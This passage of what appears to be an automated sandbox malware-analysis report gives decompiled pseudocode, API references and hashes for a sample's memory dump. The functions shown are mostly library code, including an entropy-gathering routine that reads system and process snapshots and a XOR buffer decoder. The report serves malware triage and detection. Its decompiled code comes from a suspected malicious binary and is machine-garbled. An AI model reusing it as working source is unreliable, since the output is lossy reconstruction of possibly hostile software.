				_t23 = E00420C62(__edx, __edx, _t39, _t39 * 4);
				_t43 = 0;
				 *__edx = _t23;
				_t46 = _t45 + 4;
				_v8 = 0;
				if(_t39 > 0) {
					do {
						_t24 = E00420C62(_t30, _t37, _t39, 0x25c); // executed
						 *((intOrPtr*)( *_t30 + _t43 * 4)) = _t24;
						E0042B420( *((intOrPtr*)( *_t30 + _t43 * 4)), 0, 0x97);
						_t38 = _v8;
						_t44 =  *(_v12 + _t38 * 4);
						_t29 = memcpy( *( *_t30 + _t38 * 4), _t44, 0x25 << 2);
						_t46 = _t46 + 0x1c;
						_t39 = _t44 + 0x4a;
						asm("movsw");
						asm("movsb");
						do {
							 *( *( *_t30 + _t38 * 4) + _t29) =  *( *( *_t30 + _t38 * 4) + _t29) ^ 0x00000080;
							_t29 = _t29 + 1;
						} while (_t29 < 0x97);
						_t37 = _t38 + 1;
						_t43 = _t37;
						_v8 = _t37;
					} while (_t37 < _a4);
				}
				return _t23;
			}

0x0040ef50
0x0040ef59
0x0040ef5c
0x0040ef5e
0x0040ef69
0x0040ef6e
0x0040ef70
0x0040ef72
0x0040ef75
0x0040ef7a
0x0040ef80
0x0040ef85
0x0040ef93
0x0040ef9b
0x0040efa7
0x0040efb3
0x0040efb8
0x0040efb8
0x0040efb8
0x0040efba
0x0040efbc
0x0040efc0
0x0040efc5
0x0040efc9
0x0040efca
0x0040efd1
0x0040efd2
0x0040efd4
0x0040efd7
0x0040ef80
0x0040efe2

APIs

_malloc.LIBCMT ref: 0040EF69

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040EF85
_memset.LIBCMT ref: 0040EF9B

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap_memset
String ID:
API String ID: 3655941445-0
Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t13;

				_push(8);
				_push(0x507df0);
				_t4 = E00428520(__ebx, __edi, __esi);
				if( *0x51106c == 0) {
					E00428AF7(6);
					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
					_t16 =  *0x51106c;
					if( *0x51106c == 0) {
						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
						 *0x51106c =  *0x51106c + 1;
					}
					 *(_t13 - 4) = 0xfffffffe;
					_t4 = E0042FBAB();
				}
				return E00428565(_t4);
			}

0x0042fb64
0x0042fb66
0x0042fb6b
0x0042fb77
0x0042fb7b
0x0042fb81
0x0042fb85
0x0042fb8c
0x0042fb8e
0x0042fb93
0x0042fb93
0x0042fb99
0x0042fba0
0x0042fba0
0x0042fbaa

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 360932542-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00427F3D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x00427f40
0x00427f42
0x00427f44
0x00427f47
0x00427f50

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587
libraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E00481920() {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				char _v116;
				char _v144;
				struct _MEMORYSTATUS _v176;
				struct _OSVERSIONINFOA _v324;
				char _v620;
				char _v1168;
				long _v1172;
				char _v1176;
				_Unknown_base(*)()* _v1180;
				struct HINSTANCE__* _v1184;
				_Unknown_base(*)()* _v1188;
				_Unknown_base(*)()* _v1192;
				char _v1196;
				void* _v1200;
				_Unknown_base(*)()* _v1204;
				_Unknown_base(*)()* _v1208;
				_Unknown_base(*)()* _v1212;
				_Unknown_base(*)()* _v1216;
				char _v1220;
				_Unknown_base(*)()* _v1224;
				_Unknown_base(*)()* _v1228;
				_Unknown_base(*)()* _v1232;
				_Unknown_base(*)()* _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr* _v1248;
				intOrPtr _v1252;
				char _v1284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t188;
				struct HINSTANCE__* _t194;
				struct HINSTANCE__* _t195;
				struct HINSTANCE__* _t196;
				intOrPtr* _t197;
				struct HINSTANCE__* _t198;
				struct HINSTANCE__* _t199;
				struct HINSTANCE__* _t200;
				intOrPtr* _t226;
				intOrPtr* _t237;
				long _t285;
				intOrPtr* _t289;
				intOrPtr* _t290;
				void* _t345;
				void* _t346;
				_Unknown_base(*)()* _t347;
				_Unknown_base(*)()* _t348;
				_Unknown_base(*)()* _t353;
				_Unknown_base(*)()* _t357;
				_Unknown_base(*)()* _t359;
				void* _t360;
				intOrPtr* _t363;
				void* _t364;
				struct HINSTANCE__* _t366;
				intOrPtr _t367;
				signed int _t368;
				void* _t369;
				intOrPtr _t370;

				_push(0xfffffffe);
				_push(0x508360);
				_push(E004285C0);
				_push( *[fs:0x0]);
				_t370 = _t369 - 8;
				E0042F7C0(0x4e8);
				_t187 =  *0x50ad20; // 0x4ea20c1c
				_v12 = _v12 ^ _t187;
				_t188 = _t187 ^ _t368;
				_v32 = _t188;
				_push(_t345);
				_push(_t188);
				 *[fs:0x0] =  &_v20;
				_v28 = _t370;
				_v1196 = 0;
				_t359 = 0;
				_v1224 = 0;
				_v324.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v324);
				_v1188 = LoadLibraryA("ADVAPI32.DLL");
				_v1184 = LoadLibraryA("KERNEL32.DLL");
				_t194 = LoadLibraryA("NETAPI32.DLL");
				_v1212 = _t194;
				_t347 = 0;
				_v1192 = 0;
				_v1172 = 0;
				_v1180 = 0;
				_v1208 = 0;
				_t357 = 0;
				_v1204 = 0;
				_t363 = GetProcAddress;
				if(_t194 != 0) {
					_v1208 = GetProcAddress(_t194, "NetStatisticsGet");
					_t357 = GetProcAddress(_v1212, "NetApiBufferFree");
					_v1204 = _t357;
					_t347 = _v1208;
				}
				if(_t347 != 0 && _t357 != 0) {
					_push( &_v1176);
					_push(0);
					_push(0);
					_push(L"LanmanServer");
					_push(0);
					if( *_v1208() == 0) {
						E0042F7C0(8);
						asm("movsd xmm0, [0x4f6e60]");
						asm("movsd [esp], xmm0");
						E0045D550(_t345, _t359, _t363, _t368, _v1176, 0x44);
						_t370 = _t370 + 0x10;
						_v1204(_v1176);
					}
				}
				_t195 = _v1212;
				if(_t195 != 0) {
					FreeLibrary(_t195);
				}
				_t196 = _v1188;
				if(_t196 == 0) {
					_t348 = 0;
				} else {
					_v1192 = GetProcAddress(_t196, "CryptAcquireContextW");
					_v1172 = GetProcAddress(_v1188, "CryptGenRandom");
					_t348 = GetProcAddress(_v1188, "CryptReleaseContext");
					_v1180 = _t348;
				}
				_t197 = _v1192;
				if(_t197 != 0 && _v1172 != _t359 && _t348 != 0) {
					_push(0xf0000000);
					_push(1);
					_push(0);
					_push(0);
					_push( &_v1196);
					if( *_t197() != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1196);
						if(_v1172() != 0) {
							E0042F7C0(8);
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v96, 0x40);
							_t370 = _t370 + 0x10;
							_t359 = 1;
							_v1224 = 1;
						}
						_v1180(_v1196, 0);
					}
					_push(0);
					_push(0x16);
					_push(L"Intel Hardware Cryptographic Service Provider");
					_push(0);
					_push( &_v1196);
					if( *_v1192() != 0) {
						_push( &_v96);
						_push(0x40);
						_push(_v1196);
						if(_v1172() != 0) {
							E0042F7C0(8);
							asm("movsd xmm0, [0x4f6e70]");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v96, 0x40);
							_t370 = _t370 + 0x10;
							_t359 = 1;
							_v1224 = 1;
						}
						_v1180(_v1196, 0);
					}
				}
				_t198 = _v1188;
				if(_t198 != 0) {
					FreeLibrary(_t198);
				}
				if(_v324.dwPlatformId != 2 || E004549A0(_t345) == 0) {
					_t199 = LoadLibraryA("USER32.DLL");
					_v1180 = _t199;
					if(_t199 != 0) {
						_v1200 = GetProcAddress(_t199, "GetForegroundWindow");
						_v1216 = GetProcAddress(_v1180, "GetCursorInfo");
						_t363 = GetProcAddress(_v1180, "GetQueueStatus");
						_t289 = _v1200;
						if(_t289 != 0) {
							_v1200 =  *_t289();
							E0042F7C0(8);
							asm("xorps xmm0, xmm0");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v1200, 4);
							_t370 = _t370 + 0x10;
						}
						_t290 = _v1216;
						if(_t290 != 0 && (_v324.dwPlatformId != 2 || _v324.dwMajorVersion >= 5) && _t290 != 0) {
							_v116 = 0x14;
							_push( &_v116);
							if( *_t290() != 0) {
								E0042F7C0(8);
								asm("movsd xmm0, [0x4f6e38]");
								asm("movsd [esp], xmm0");
								E0045D550(_t345, _t359, _t363, _t368,  &_v116, _v116);
								_t370 = _t370 + 0x10;
							}
						}
						if(_t363 != 0) {
							_v1220 =  *_t363(0xbf);
							E0042F7C0(8);
							asm("movsd xmm0, [0x4d75f0]");
							asm("movsd [esp], xmm0");
							E0045D550(_t345, _t359, _t363, _t368,  &_v1220, 4);
							_t370 = _t370 + 0x10;
						}
						FreeLibrary(_v1180);
					}
				}
				_t200 = _v1184;
				if(_t200 == 0) {
					L92:
					E00482470(_t345, _t359, _t363, _t368);
					GlobalMemoryStatus( &_v176);
					E0042F7C0(8);
					asm("movsd xmm0, [0x4d75f0]");
					asm("movsd [esp], xmm0");
					E0045D550(_t345, _t359, _t363, _t368,  &_v176, 0x20);
					_v1220 = GetCurrentProcessId();
					E0042F7C0(8);
					asm("movsd xmm0, [0x4d75f0]");
					asm("movsd [esp], xmm0");
					E0045D550(_t345, _t359, _t363, _t368,  &_v1220, 4);
					 *[fs:0x0] = _v20;
					_pop(_t360);
					_pop(_t364);
					_pop(_t346);
					return E0042A77E(_t346, _v32 ^ _t368, _t357, _t360, _t364);
				} else {
					_v1172 = 0;
					_v1208 = 0;
					_t363 = GetProcAddress;
					_v1180 = GetProcAddress(_t200, "CreateToolhelp32Snapshot");
					_v1248 = GetProcAddress(_v1184, "CloseToolhelp32Snapshot");
					_v1192 = GetProcAddress(_v1184, "Heap32First");
					_v1204 = GetProcAddress(_v1184, "Heap32Next");
					_v1212 = GetProcAddress(_v1184, "Heap32ListFirst");
					_v1188 = GetProcAddress(_v1184, "Heap32ListNext");
					_v1236 = GetProcAddress(_v1184, "Process32First");
					_v1228 = GetProcAddress(_v1184, "Process32Next");
					_v1232 = GetProcAddress(_v1184, "Thread32First");
					_v1216 = GetProcAddress(_v1184, "Thread32Next");
					_v1200 = GetProcAddress(_v1184, "Module32First");
					_t353 = GetProcAddress(_v1184, "Module32Next");
					_v1240 = _t353;
					_t226 = _v1180;
					if(_t226 == 0 || _v1192 == 0 || _v1204 == 0 || _v1212 == 0 || _v1188 == 0 || _v1236 == 0 || _v1228 == 0 || _v1232 == 0 || _v1216 == 0 || _v1200 == 0 || _t353 == 0) {
						L91:
						FreeLibrary(_v1184);
						goto L92;
					} else {
						_t363 =  *_t226(0xf, 0);
						_v1176 = _t363;
						if(_t363 == 0xffffffff) {
							goto L91;
						}
						asm("xorps xmm0, xmm0");
						asm("movdqu [ebp-0x6c], xmm0");
						_v112 = 0x10;
						if(_t359 != 0) {
							_t285 = GetTickCount();
							_v1172 = _t285;
							_v1208 = _t285;
						}
						_push( &_v112);
						_push(_t363);
						if(_v1212() == 0) {
							L69:
							_v620 = 0x128;
							_t363 = GetTickCount;
							if(_t359 != 0) {
								_v1172 = GetTickCount();
							}
							_push( &_v620);
							_push(_v1176);
							if(_v1236() == 0) {
								L75:
								_v144 = 0x1c;
								if(_t359 != 0) {
									_v1172 = GetTickCount();
								}
								_push( &_v144);
								_push(_v1176);
								if(_v1232() == 0) {
									L82:
									_v1168 = 0x224;
									if(_t359 != 0) {
										_v1172 = GetTickCount();
									}
									_push( &_v1168);
									_push(_v1176);
									if(_v1200() == 0) {
										L88:
										_t237 = _v1248;
										_push(_v1176);
										if(_t237 == 0) {
											CloseHandle();
										} else {
											 *_t237();
										}
										goto L91;
									} else {
										do {
											E0042F7C0(8);
											asm("movsd xmm0, [0x4f6e58]");
											asm("movsd [esp], xmm0");
											E0045D550(_t345, _t359, _t363, _t368,  &_v1168, _v1168);
											_t370 = _t370 + 0x10;
											_push( &_v1168);
											_push(_v1176);
										} while (_v1240() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
										goto L88;
									}
								} else {
									do {
										E0042F7C0(8);
										asm("movsd xmm0, [0x4f6e50]");
										asm("movsd [esp], xmm0");
										E0045D550(_t345, _t359, _t363, _t368,  &_v144, _v144);
										_t370 = _t370 + 0x10;
										_push( &_v144);
										_push(_v1176);
									} while (_v1216() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
									goto L82;
								}
							} else {
								do {
									E0042F7C0(8);
									asm("movsd xmm0, [0x4f6e58]");
									asm("movsd [esp], xmm0");
									E0045D550(_t345, _t359, _t363, _t368,  &_v620, _v620);
									_t370 = _t370 + 0x10;
									_push( &_v620);
									_push(_v1176);
								} while (_v1228() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8));
								goto L75;
							}
						} else {
							_t366 = 0x2a;
							_v1180 = 0x2a;
							do {
								E0042F7C0(8);
								asm("movsd xmm0, [0x4f6e40]");
								asm("movsd [esp], xmm0");
								E0045D550(_t345, _t359, _t366, _t368,  &_v112, _v112);
								_t370 = _t370 + 0x10;
								asm("wait");
								_v8 = 0;
								asm("xorps xmm0, xmm0");
								asm("movdqu [ebp-0x500], xmm0");
								asm("movdqu [ebp-0x4f0], xmm0");
								_v1252 = 0;
								_v1284 = 0x24;
								_push(_v104);
								_push(_v108);
								_push( &_v1284);
								if(_v1192() == 0) {
									goto L64;
								}
								_t367 = 0x50;
								_v1244 = 0x50;
								while(1) {
									E0042F7C0(8);
									asm("movsd xmm0, [0x4f6e48]");
									asm("movsd [esp], xmm0");
									E0045D550(_t345, _t359, _t367, _t368,  &_v1284, _v1284);
									_t370 = _t370 + 0x10;
									_push( &_v1284);
									if(_v1204() == 0 || _t359 != 0 && GetTickCount() - _v1172 >= 0x3e8) {
										break;
									}
									_t367 = _t367 - 1;
									_v1244 = _t367;
									if(_t367 > 0) {
										continue;
									}
									break;
								}
								_t366 = _v1180;
								L64:
								asm("wait");
								_v8 = 0xfffffffe;
								_push( &_v112);
								_push(_v1176);
							} while (_v1188() != 0 && (_t359 == 0 || GetTickCount() - _v1172 < 0x3e8) && _t366 > 0);
							goto L69;
						}
					}
				}
			}

0x00481923
0x00481925
0x0048192a
0x00481935
0x00481936
0x0048193e
0x00481943
0x00481948
0x0048194b
0x0048194d
0x00481950
0x00481953
0x00481957
0x0048195d
0x00481960
0x0048196a
0x0048196c
0x00481972
0x00481983
0x00481996
0x004819a3
0x004819ae
0x004819b0
0x004819b6
0x004819b8
0x004819be
0x004819c4
0x004819ca
0x004819d0
0x004819d2
0x004819d8
0x004819e0
0x004819ea
0x004819fd
0x004819ff
0x00481a05
0x00481a05
0x00481a0d
0x00481a6f
0x00481a70
0x00481a72
0x00481a74
0x00481a79
0x00481a85
0x00481a8c
0x00481a91
0x00481a99
0x00481aa6
0x00481aab
0x00481ab4
0x00481ab4
0x00481a85
0x00481aba
0x00481ac2
0x00481ac5
0x00481ac5
0x00481acb
0x00481ad3
0x00481b0d
0x00481ad5
0x00481add
0x00481af0
0x00481b03
0x00481b05
0x00481b05
0x00481b0f
0x00481b17
0x00481b31
0x00481b36
0x00481b38
0x00481b3a
0x00481b42
0x00481b47
0x00481b4c
0x00481b4d
0x00481b4f
0x00481b5d
0x00481b64
0x00481b69
0x00481b6c
0x00481b77
0x00481b7c
0x00481b7f
0x00481b84
0x00481b84
0x00481b92
0x00481b92
0x00481b98
0x00481b9a
0x00481b9c
0x00481ba1
0x00481ba9
0x00481bb4
0x00481bb9
0x00481bba
0x00481bbc
0x00481bca
0x00481bd1
0x00481bd6
0x00481bde
0x00481be9
0x00481bee
0x00481bf1
0x00481bf6
0x00481bf6
0x00481c04
0x00481c04
0x00481bb4
0x00481c0a
0x00481c12
0x00481c15
0x00481c15
0x00481c22
0x00481c36
0x00481c3c
0x00481c44
0x00481c52
0x00481c65
0x00481c78
0x00481c7a
0x00481c82
0x00481c86
0x00481c91
0x00481c96
0x00481c99
0x00481ca7
0x00481cac
0x00481cac
0x00481caf
0x00481cb7
0x00481ccf
0x00481cd9
0x00481cde
0x00481ce5
0x00481cea
0x00481cf2
0x00481cfe
0x00481d03
0x00481d03
0x00481cde
0x00481d08
0x00481d11
0x00481d1c
0x00481d21
0x00481d29
0x00481d37
0x00481d3c
0x00481d3c
0x00481d45
0x00481d45
0x00481c44
0x00481d4b
0x00481d53
0x0048223f
0x0048223f
0x0048224b
0x00482256
0x0048225b
0x00482263
0x00482271
0x0048227f
0x0048228a
0x0048228f
0x00482297
0x004822a5
0x004822b5
0x004822bd
0x004822be
0x004822bf
0x004822cd
0x00481d59
0x00481d5b
0x00481d61
0x00481d6d
0x00481d75
0x00481d88
0x00481d9b
0x00481dae
0x00481dc1
0x00481dd4
0x00481de7
0x00481dfa
0x00481e0d
0x00481e20
0x00481e33
0x00481e46
0x00481e48
0x00481e4e
0x00481e56
0x00482233
0x00482239
0x00000000
0x00481ed9
0x00481edf
0x00481ee1
0x00481eea
0x00000000
0x00000000
0x00481ef0
0x00481ef3
0x00481ef8
0x00481f01
0x00481f03
0x00481f09
0x00481f0f
0x00481f0f
0x00481f18
0x00481f19
0x00481f22
0x00482081
0x00482081
0x0048208b
0x00482093
0x00482097
0x00482097
0x004820a3
0x004820a4
0x004820b2
0x0048210a
0x0048210a
0x00482116
0x0048211a
0x0048211a
0x00482126
0x00482127
0x00482135
0x00482196
0x00482196
0x004821a2
0x004821a6
0x004821a6
0x004821b2
0x004821b3
0x004821c1
0x00482219
0x00482219
0x0048221f
0x00482227
0x0048222d
0x00482229
0x00482229
0x00482229
0x00000000
0x004821c3
0x004821c3
0x004821c8
0x004821cd
0x004821d5
0x004821e7
0x004821ec
0x004821f5
0x004821f6
0x00482202
0x00000000
0x004821c3
0x00482137
0x00482140
0x00482145
0x0048214a
0x00482152
0x00482164
0x00482169
0x00482172
0x00482173
0x0048217f
0x00000000
0x00482140
0x004820b4
0x004820b4
0x004820b9
0x004820be
0x004820c6
0x004820d8
0x004820dd
0x004820e6
0x004820e7
0x004820f3
0x00000000
0x004820b4
0x00481f28
0x00481f28
0x00481f2d
0x00481f33
0x00481f38
0x00481f3d
0x00481f45
0x00481f51
0x00481f56
0x00481f59
0x00481f5a
0x00481f61
0x00481f64
0x00481f6c
0x00481f74
0x00481f7e
0x00481f88
0x00481f8b
0x00481f94
0x00481f9d
0x00000000
0x00000000
0x00481f9f
0x00481fa4
0x00481fb0
0x00481fb5
0x00481fba
0x00481fc2
0x00481fd4
0x00481fd9
0x00481fe2
0x00481feb
0x00000000
0x00000000
0x00482004
0x00482005
0x0048200d
0x00000000
0x00000000
0x00000000
0x0048200d
0x0048200f
0x00482015
0x00482015
0x00482016
0x00482051
0x00482052
0x0048205e
0x00000000
0x00481f33
0x00481f22
0x00481e56

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

NETAPI32.DLL, xrefs: 004819A9
Thread32First, xrefs: 00481E00
Process32Next, xrefs: 00481DED
Heap32ListNext, xrefs: 00481DC7
Heap32Next, xrefs: 00481DA1
Module32First, xrefs: 00481E26
USER32.DLL, xrefs: 00481C31
CryptReleaseContext, xrefs: 00481AF6
GetCursorInfo, xrefs: 00481C58
CryptGenRandom, xrefs: 00481AE3
ADVAPI32.DLL, xrefs: 00481989
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
GetForegroundWindow, xrefs: 00481C4A
Heap32ListFirst, xrefs: 00481DB4
NetApiBufferFree, xrefs: 004819F0
KERNEL32.DLL, xrefs: 0048199C
Heap32First, xrefs: 00481D8E
LanmanWorkstation, xrefs: 00481A26
CreateToolhelp32Snapshot, xrefs: 00481D67
GetQueueStatus, xrefs: 00481C6B
Thread32Next, xrefs: 00481E13
Module32Next, xrefs: 00481E39
NetStatisticsGet, xrefs: 004819E2
Process32First, xrefs: 00481DDA
CloseToolhelp32Snapshot, xrefs: 00481D7B
LanmanServer, xrefs: 00481A74
$, xrefs: 00481F7E
CryptAcquireContextW, xrefs: 00481AD5

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
